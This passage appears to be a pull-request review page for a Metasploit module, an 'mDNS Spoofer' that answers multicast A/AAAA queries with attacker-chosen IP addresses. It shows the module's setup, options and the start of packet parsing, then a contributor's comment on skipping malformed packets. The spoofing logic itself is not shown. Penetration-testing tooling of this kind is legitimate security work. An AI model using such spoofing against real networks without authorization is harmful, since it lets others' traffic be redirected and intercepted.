modules/auxiliary/spoof/mdns/mdns_response.rb

```diff
@@ -0,0 +1,253 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'socket'
+require 'ipaddr'
+require 'net/dns'
+
+class MetasploitModule < Msf::Auxiliary
+
+include Msf::Exploit::Capture
+
+attr_accessor :sock, :thread
+
+
+  def initialize
+    super(
+      'Name'        => 'mDNS Spoofer',
+      'Description' => %q{
+          This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).
+      },
+      'Author'     => [ 'Joe Testa <jtesta[at]positronsecurity.com>', 'James Lee <egypt[at]metasploit.com>', 'Robin Francois <rof[at]navixia.com>' ],
+      'License'    => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'URL', 'https://tools.ietf.org/html/rfc6762' ]
+        ],
+
+        'Actions'     =>
+        [
+          [ 'Service' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service'
+    )
+
+    register_options([
+      OptAddress.new('SPOOFIP4', [ true, "IPv4 address with which to spoof A-record queries", ""]),
+      OptAddress.new('SPOOFIP6', [ false, "IPv6 address with which to spoof AAAA-record queries", ""]),
+      OptRegexp.new('REGEX', [ true, "Regex applied to the mDNS to determine if spoofed reply is sent", '.*']),
+      OptInt.new('TTL', [ false, "Time To Live for the spoofed response (in seconds)", 120]),
+    ])
+
+    deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
+    self.thread = nil
+    self.sock = nil
+  end
+
+  def dispatch_request(packet, rhost, src_port)
+    rhost = ::IPAddr.new(rhost)
+
+    # `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
+    # addr like "::ffff:192.168.0.1" when the interface we're listening
+    # on has an IPv6 address. Convert it to just the v4 addr
+    if rhost.ipv4_mapped?
+      rhost = rhost.native
+    end
+
+    # Parse the incoming MDNS packet.  Quit if an exception was thrown.
+    dns_pkt = nil
+    begin
+      dns_pkt = ::Net::DNS::Packet.parse(packet)
+    rescue
+      return
```

Comment:
Yeah, I realized its not an ideal solution.  The problem is that there are apparently some MDNS packets that are not strictly DNS-valid, so the parse() method blows up... rather often, too.  So printing an error means stdout gets spammed.

The packet type that causes the parse error is not an A or AAAA query, so skipping it entirely does not impact this module's goal.  Unless there is an MDNS library available, it seems like this work-around is the best route.